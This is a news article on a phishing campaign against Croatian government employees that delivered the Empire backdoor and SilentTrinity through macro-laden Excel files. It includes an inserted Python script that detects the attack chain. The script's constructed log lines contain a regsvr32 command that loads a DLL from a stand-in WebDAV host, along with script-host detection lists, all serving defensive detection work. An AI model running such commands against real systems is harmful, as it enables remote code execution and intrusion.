According to security researchers at Positive Technologies, a secretive hacker group targeted Croatian government employees, and possibly infected their systems, between February and April this year.
In a blog post, researchers said that emails contained a link to a remote website with a lookalike URL, where users were asked to download an Excel document.
Inside the document are commands that create a Visual Basic script which, when run, establishes a WebDAV network connection and then downloads and runs the file for the next stage of infection with the help of the legitimate system utility regsvr32. Researchers said that parts of the script may be borrowed from third-party sources.
The macro script, if enabled by the victim, would download and install malware. The first malware downloaded was the Empire Backdoor, which enables remote control of a victim's computer and is part of the Empire post-exploitation framework.
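The chain described above (Office document, script host, WebDAV connection, regsvr32 loading the next stage) leaves a recognisable trail in process-creation telemetry. The following Python is an added example, not code from the article or from Positive Technologies, that runs two defensive heuristics over constructed Sysmon-style process events: an Office application spawning a script host, and regsvr32 being pointed at a UNC/WebDAV path or URL rather than a local DLL. The log lines, paths and the TEST-NET address are all made up for the example and are not indicators from the campaign.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample of process-creation events in a Sysmon-like key="value"
# layout. These lines are invented for the example; 203.0.113.5 is from the
# TEST-NET-3 documentation range, not an indicator from the campaign.
SAMPLE_LOG = [
    r'ParentImage="C:\Windows\explorer.exe" Image="C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" CommandLine="EXCEL.EXE C:\Users\u\Downloads\report.xls"',
    r'ParentImage="C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" Image="C:\Windows\System32\wscript.exe" CommandLine="wscript.exe C:\Users\u\AppData\Local\Temp\stage.vbs"',
    r'ParentImage="C:\Windows\System32\wscript.exe" Image="C:\Windows\System32\regsvr32.exe" CommandLine="regsvr32.exe /s \\203.0.113.5@80\dav\stage.dll"',
    r'ParentImage="C:\Windows\System32\msiexec.exe" Image="C:\Windows\System32\regsvr32.exe" CommandLine="regsvr32.exe /s C:\Program Files\Vendor\component.dll"',
]

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "cmd.exe"}

# A UNC path (\\host\share, including the \\host@80\share form Windows uses to
# address WebDAV shares) or an http(s) URL on the regsvr32 command line.
REMOTE_SOURCE = re.compile(r'\\\\[^\\\s]+\\|https?://', re.IGNORECASE)

# key="value" pairs; values contain no double quotes in this layout.
FIELD = re.compile(r'(\w+)="([^"]*)"')


def parse_event(line):
    """Turn one key="value" log line into a dict of fields."""
    return dict(FIELD.findall(line))


def basename(path):
    """Lower-cased file name of a Windows path, e.g. 'excel.exe'."""
    return PureWindowsPath(path).name.lower()


def classify(event):
    """Return the names of the heuristics this event matches."""
    hits = []
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    # Office applications normally have no business launching script hosts.
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")
    # regsvr32 registering a local vendor DLL is routine; fetching its payload
    # from a WebDAV share or URL is the stage-two pattern described above.
    if image == "regsvr32.exe" and REMOTE_SOURCE.search(cmd):
        hits.append("regsvr32_remote_source")
    return hits


def scan(lines):
    """Run the heuristics over a list of log lines; return (rule, image) hits."""
    findings = []
    for line in lines:
        event = parse_event(line)
        for rule in classify(event):
            findings.append((rule, basename(event["Image"])))
    return findings


if __name__ == "__main__":
    for rule, image in scan(SAMPLE_LOG):
        print(f"{rule}: {image}")
```

Both heuristics deliberately ignore the script's contents and the DLL's hash, so they still fire when the in-memory stages change; the benign fourth line (an installer registering a local DLL) shows the regsvr32 rule keying on where the payload comes from rather than on the utility itself.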
Another piece of malware downloaded was SilentTrinity. Researchers said that this is the first time this malware has been used by hackers in an active campaign.
SC previously reported that SilentTrinity was developed by Marcello Salvati (a researcher at Black Hills Information Security) in October 2018 and uploaded to GitHub, and that he also created IronPython. In a correction, Salvati has tweeted: "I did not create IronPython & I did not do the research on the actual Malware, Alexey Vishnyakov did at @ptsecurity."
Researchers said that the attack is fileless and does not require disk space: dependencies, scripts, and tasks all reside in RAM. All C2 traffic is encrypted with AES, including the archive with dependencies, tasks, and command output.
They added that the domain names used in the attack were chosen to resemble those of legitimate sites.
"Such names would presumably arouse less suspicion among phishing targets. Not all the impersonated domains related to Croatia," said researchers.
"All attacker domains were registered with WhoisGuard privacy protection. Ordinarily used to protect domain owners from spam by hiding personal information, this feature helped the attackers to remain anonymous."
According to researchers, the day after detection of the malicious documents, a press release was issued in which the Croatian Information Systems Security Bureau raised the alarm about targeted phishing attacks.
"Traces were discovered on multiple Croatian government systems. According to the press release, the victims received emails with links to a phishing site. There they were prompted to download a malicious document, which was the jumping-off point of our analysis," said researchers.
Javvad Malik, security awareness advocate at KnowBe4, told SC Media UK that while this attack has malware embedded in a document, it is largely reliant on being able to trick users into clicking the phishing link to the document as well as having macros enabled to automatically run.
"This is why user awareness training plays such an important role in preventing phishing and other social engineering attacks from being successful," he said.
Stuart Sharp, global director of solution engineering at OneLogin, told SC Media UK that as phishing becomes increasingly sophisticated, businesses should urgently upgrade the security of core applications and administrative accounts by introducing more modern forms of 2FA such as WebAuthn, which leverages device-based cryptography to prevent even advanced malware and man-in-the-middle phishing attacks.
"WebAuthn is popular with end users because it requires no password and allows them to utilise biometric sensors like fingerprint scanning and facial recognition that they already use to unlock their phones," he said.